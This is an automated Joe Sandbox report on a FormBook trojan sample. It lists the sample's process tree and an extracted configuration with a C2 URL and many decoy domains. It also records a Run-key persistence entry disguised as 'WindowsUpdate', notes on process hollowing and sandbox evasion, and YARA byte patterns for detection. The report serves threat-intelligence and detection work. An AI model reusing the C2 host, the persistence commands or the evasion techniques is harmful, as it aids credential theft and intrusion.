Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
M1Y6kc9FpE.exe

Overview

General Information

Sample name:M1Y6kc9FpE.exe
renamed because original name is a hash value
Original sample name:a1cafe0d39cc17c0e36db2afdb4f640e3e81da7b2302c01e03c96348723ffdc9.exe
Analysis ID:1549399
MD5:7d8165e194302250d880425b1608e307
SHA1:2688c9a6a3946fd7d93fd861c5f94c0dd67ae593
SHA256:a1cafe0d39cc17c0e36db2afdb4f640e3e81da7b2302c01e03c96348723ffdc9
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • M1Y6kc9FpE.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\M1Y6kc9FpE.exe" MD5: 7D8165E194302250D880425B1608E307)
    • wscript.exe (PID: 7876 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7968 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 8040 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 7988 cmdline: "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docx MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • oxhvi.msc (PID: 8084 cmdline: oxhvi.msc bvqmcwxut.docx MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 3360 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 1220 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
              • ipconfig.exe (PID: 3780 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
                • cmd.exe (PID: 7508 cmdline: /c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • rundll32.exe (PID: 5336 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
              • oxhvi.msc.exe (PID: 7596 cmdline: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC MD5: 0ADB9B817F1DF7807576C2D7068DD931)
                • RegSvcs.exe (PID: 3228 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
                • RegSvcs.exe (PID: 1548 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • netsh.exe (PID: 1508 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • netsh.exe (PID: 5472 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • oxhvi.msc.exe (PID: 1796 cmdline: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC MD5: 0ADB9B817F1DF7807576C2D7068DD931)
                • RegSvcs.exe (PID: 2768 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
                • RegSvcs.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • cmmon32.exe (PID: 2940 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)
              • cmmon32.exe (PID: 2884 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)
              • oxhvi.msc.exe (PID: 4132 cmdline: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC MD5: 0ADB9B817F1DF7807576C2D7068DD931)
                • RegSvcs.exe (PID: 2100 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
                • RegSvcs.exe (PID: 636 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • control.exe (PID: 7776 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
              • autofmt.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)
      • cmd.exe (PID: 8188 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7352 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ybokiesite.online/o52o/"], "decoy": ["ckroom.xyz", "apanstock.online", "6dtd8.vip", "phone-in-installment-kz.today", "ichaellee.info", "mpresamkt38.online", "ivein.today", "78cx465vo.autos", "avannahholcomb.shop", "eochen008.top", "rcraft.net", "eth-saaae.buzz", "ifxz.info", "flegendarycap50.online", "reon-network.xyz", "ee.zone", "ameralife.net", "5en4.shop", "eal-delivery-34026.bond", "anion.app", "avada-ga-17.press", "inlinlong.top", "eal-estate-90767.bond", "opesclosetyork.net", "gormendonca.online", "ackyard-fence-grants.today", "acuum-cleaner-84638.bond", "martdataclient.sbs", "1r1f9bnfo4s4.top", "66hf918cz.autos", "lush-diamond.info", "ome-decor-10002.bond", "onceng77gacor.xyz", "ake-money-online-34699.bond", "wen-paaac.buzz", "mewtcp.xyz", "alyk.cloud", "overedplans.net", "igurisland-cruise-deals.today", "niverse-tech.net", "indseniorjob881.click", "rostitutkivladimiraslap.net", "inecraftpuro.net", "ames666.xyz", "arehouse-inventory-62571.bond", "infeng01.xyz", "jg-bw.app", "y09ypy.pro", "uratool.net", "4hamnghi.online", "j2g.xyz", "ental-health-54823.bond", "teplero.shop", "01595.xyz", "xs5.buzz", "elationship-coach-44953.bond", "heiritforum.buzz", "lladinco.online", "heheartofthehome.net", "uantumcircles.world", "ork-in-usa-60761.bond", "tonic.cafe", "agaglobalcapital.net", "eusvexk.shop"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\qbmt\bvqmcwxut.docxJoeSecurity_AutoitInjectorYara detected Autoit InjectorJoe Security
    C:\Users\user\AppData\Local\Temp\RarSFX0\bvqmcwxut.docxJoeSecurity_AutoitInjectorYara detected Autoit InjectorJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18819:$sqlite3step: 68 34 1C 7B E1
          • 0x1892c:$sqlite3step: 68 34 1C 7B E1
          • 0x18848:$sqlite3text: 68 38 2A 90 C5
          • 0x1896d:$sqlite3text: 68 38 2A 90 C5
          • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 301 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          15.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            15.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              15.2.RegSvcs.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
              • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
              15.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
              • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              15.2.RegSvcs.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
              • 0x18819:$sqlite3step: 68 34 1C 7B E1
              • 0x1892c:$sqlite3step: 68 34 1C 7B E1
              • 0x18848:$sqlite3text: 68 38 2A 90 C5
              • 0x1896d:$sqlite3text: 68 38 2A 90 C5
              • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
              Click to see the 5 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Invoke-Obfuscation CLIP+ Launcher
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7876, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 7968, ProcessName: cmd.exe
              Sigma detected: Invoke-Obfuscation VAR+ Launcher
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7876, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 7968, ProcessName: cmd.exe
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
              Sigma detected: Rundll32 Execution Without CommandLine Parameters
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4084, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 5336, ProcessName: rundll32.exe
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\M1Y6kc9FpE.exe", ParentImage: C:\Users\user\Desktop\M1Y6kc9FpE.exe, ParentProcessId: 7708, ParentProcessName: M1Y6kc9FpE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ProcessId: 7876, ProcessName: wscript.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\M1Y6kc9FpE.exe", ParentImage: C:\Users\user\Desktop\M1Y6kc9FpE.exe, ParentProcessId: 7708, ParentProcessName: M1Y6kc9FpE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ProcessId: 7876, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\M1Y6kc9FpE.exe", ParentImage: C:\Users\user\Desktop\M1Y6kc9FpE.exe, ParentProcessId: 7708, ParentProcessName: M1Y6kc9FpE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ProcessId: 7876, ProcessName: wscript.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: oxhvi.msc bvqmcwxut.docx, CommandLine: oxhvi.msc bvqmcwxut.docx, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docx, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7988, ParentProcessName: cmd.exe, ProcessCommandLine: oxhvi.msc bvqmcwxut.docx, ProcessId: 8084, ProcessName: oxhvi.msc
              Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: oxhvi.msc bvqmcwxut.docx, ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, ParentProcessId: 8084, ParentProcessName: oxhvi.msc, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", ProcessId: 3360, ProcessName: RegSvcs.exe
              Sigma detected: Use NTFS Short Name in Command Line
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, CommandLine: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4084, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, ProcessId: 7596, ProcessName: oxhvi.msc.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\M1Y6kc9FpE.exe", ParentImage: C:\Users\user\Desktop\M1Y6kc9FpE.exe, ParentProcessId: 7708, ParentProcessName: M1Y6kc9FpE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" , ProcessId: 7876, ProcessName: wscript.exe
              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, ProcessId: 8084, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T15:57:23.745966+010020229301A Network Trojan was detected172.202.163.200443192.168.2.849706TCP
              2024-11-05T15:57:45.888405+010020229301A Network Trojan was detected20.109.210.53443192.168.2.858145TCP
              2024-11-05T15:57:47.301900+010020229301A Network Trojan was detected20.109.210.53443192.168.2.858146TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ybokiesite.online/o52o/"], "decoy": ["ckroom.xyz", "apanstock.online", "6dtd8.vip", "phone-in-installment-kz.today", "ichaellee.info", "mpresamkt38.online", "ivein.today", "78cx465vo.autos", "avannahholcomb.shop", "eochen008.top", "rcraft.net", "eth-saaae.buzz", "ifxz.info", "flegendarycap50.online", "reon-network.xyz", "ee.zone", "ameralife.net", "5en4.shop", "eal-delivery-34026.bond", "anion.app", "avada-ga-17.press", "inlinlong.top", "eal-estate-90767.bond", "opesclosetyork.net", "gormendonca.online", "ackyard-fence-grants.today", "acuum-cleaner-84638.bond", "martdataclient.sbs", "1r1f9bnfo4s4.top", "66hf918cz.autos", "lush-diamond.info", "ome-decor-10002.bond", "onceng77gacor.xyz", "ake-money-online-34699.bond", "wen-paaac.buzz", "mewtcp.xyz", "alyk.cloud", "overedplans.net", "igurisland-cruise-deals.today", "niverse-tech.net", "indseniorjob881.click", "rostitutkivladimiraslap.net", "inecraftpuro.net", "ames666.xyz", "arehouse-inventory-62571.bond", "infeng01.xyz", "jg-bw.app", "y09ypy.pro", "uratool.net", "4hamnghi.online", "j2g.xyz", "ental-health-54823.bond", "teplero.shop", "01595.xyz", "xs5.buzz", "elationship-coach-44953.bond", "heiritforum.buzz", "lladinco.online", "heheartofthehome.net", "uantumcircles.world", "ork-in-usa-60761.bond", "tonic.cafe", "agaglobalcapital.net", "eusvexk.shop"]}
              Multi AV Scanner detection for submitted file
              Source: M1Y6kc9FpE.exeReversingLabs: Detection: 79%
              Yara detected FormBook
              Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
